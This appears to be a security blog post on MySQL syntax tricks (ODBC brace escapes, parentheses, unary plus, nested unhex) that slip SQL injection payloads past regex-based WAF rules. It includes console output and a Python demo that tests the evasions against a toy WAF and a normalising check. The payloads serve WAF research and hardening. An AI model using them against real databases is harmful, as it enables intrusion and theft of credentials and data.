select {x table_name} from {x information_schema.tables}

mysql> select {x table_name} from {x information_schema.tables};
+---------------------------------------+
| table_name                            |
+---------------------------------------+
| CHARACTER_SETS                        |
| COLLATIONS                            |
| COLLATION_CHARACTER_SET_APPLICABILITY |
| COLUMNS                               |
| COLUMN_PRIVILEGES                     |
| ENGINES                               |
...

mysql> select {x version()} from {x user};
+---------------+
| {x version()} |
+---------------+
| 5.5. --log    |
| 5.5. --log    |
| 5.5. --log    |
| 5.5. --log    |
+---------------+
4 rows in set (0.00 sec)
The pattern is select {x a} from {x b}: b is any table that exists in the current database, a is whatever you want returned. The scenario I have in mind is pulling out user(), version() and the like while using { in place of the space after SELECT, so that regular-expression rules that key on whitespace never fire. Either write select{x(user())} directly, or select(user()).
Other data can be pulled the same way:

mysql> select {x (select user from user limit 1)} from {x user};
+-------------------------------------+
| {x (select user from user limit 1)} |
+-------------------------------------+
| root                                |
| root                                |
| root                                |
| root                                |
+-------------------------------------+

mysql> select{x(name)}from{x(manager)};
+-------+
| name  |
+-------+
| admin |
+-------+
1 row in set (0.00 sec)
You can take it further and drop the spaces entirely: parentheses are accepted as separators too, for example:

select(host)from(mysql.user);
select(unhex(unhex(333532453335324533323335)));

The nested unhex yields a string (here 5.5.25) without a single quote character appearing in the query.
Some WAFs have rules that match on the parentheses directly, though. The brace form gets around those as well, and because unary + is a no-op in MySQL it can stand in for the space inside the braces:

select {x+table_name} from
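To show why these payloads slip past whitespace- and parenthesis-based rules, here is an added example (not code from the original post): a toy WAF with two hypothetical regex rules of the kind the post describes, run over the post's own payload variants, next to a check that normalises the query the way MySQL's parser sees it (braces, parentheses, unary + and whitespace all collapsed to separators) before matching. The rule names, the payload set and the "manager" table are constructed for the demonstration.

```python
import re

# Constructed sample payloads (not from real traffic): the variants the post
# shows, plus a plain baseline and the spaced brace form for comparison.
PAYLOADS = {
    "plain":       "select table_name from information_schema.tables",
    "odbc_spaced": "select {x table_name} from {x information_schema.tables}",
    "odbc_tight":  "select{x table_name}from{x information_schema.tables}",
    "no_space":    "select{x(user())}from{x(user)}",
    "parens":      "select(host)from(mysql.user)",
    "unary_plus":  "select{x+table_name}from{x information_schema.tables}",
}

# Hypothetical naive WAF rules: both assume that whitespace or '(' is the
# only thing that can follow SELECT.
NAIVE_RULES = {
    "select_ws_from": re.compile(r"\bselect\s+\S.*?\s+from\s+", re.I | re.S),
    "select_paren":   re.compile(r"\bselect\s*\(", re.I),
}

# Hardened check: normalise first, then match on the keyword sequence.
# MySQL treats '{ident expr}' as just expr, '(' ')' as grouping and unary
# '+' as a no-op, so all of them are collapsed to a single space before the
# rule is applied; the rule itself no longer depends on spacing.
_SEPARATORS = re.compile(r"[\s{}()+]+")
SELECT_FROM = re.compile(r"\bselect\b.*\bfrom\b", re.I | re.S)


def normalise(sql: str) -> str:
    """Collapse whitespace, braces, parentheses and '+' into single spaces."""
    # The dummy identifier from '{x ...}' survives as a stray token 'x';
    # that does not hurt a keyword-sequence rule, so it is left in place.
    return _SEPARATORS.sub(" ", sql).strip()


def naive_verdict(sql: str) -> dict:
    """Which naive rule fired for this payload (rule name -> bool)."""
    return {name: bool(rx.search(sql)) for name, rx in NAIVE_RULES.items()}


def naive_blocked(sql: str) -> bool:
    return any(naive_verdict(sql).values())


def hardened_blocked(sql: str) -> bool:
    return bool(SELECT_FROM.search(normalise(sql)))


def decode_double_unhex(hex_literal: str) -> str:
    """What select(unhex(unhex(<literal>))) evaluates to: two hex decodes."""
    inner = bytes.fromhex(hex_literal).decode("ascii")
    return bytes.fromhex(inner).decode("ascii")


def report() -> dict:
    """Per-payload (naive_blocked, hardened_blocked) pairs."""
    return {name: (naive_blocked(p), hardened_blocked(p))
            for name, p in PAYLOADS.items()}


if __name__ == "__main__":
    for name, (naive, hardened) in report().items():
        print(f"{name:12s} naive={'block' if naive else 'PASS '} "
              f"hardened={'block' if hardened else 'PASS '}")
    print("unhex(unhex(333532453335324533323335)) ->",
          decode_double_unhex("333532453335324533323335"))
```

Running it shows the spaced brace form and the plain parenthesis form still trip the naive rules (one keys on the space after SELECT, the other on the parenthesis), while the tight brace form, the no-space form and the unary-plus form pass straight through; after normalisation every variant reduces to "select ... from ..." and is caught. The normaliser is only the principle (match on what the parser will execute, not on the bytes the attacker chose to separate tokens with), not a complete filter: string literals and comments would need their own handling.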
The braces parse because MySQL accepts the ODBC escape syntax for date/time literals ({ d '...' } and friends) and for outer joins ({ OJ ... }); see:

https://twitter.com/Black2Fan/status/564746640138182656
http://dev.mysql.com/doc/refman/5.6/en/date-and-time-literals.html#date-and-time-standard-sql-literals
http://dev.mysql.com/doc/refman/5.6/en/join.html#idm140714470997024
MySQL syntax tricks that bypass some WAFs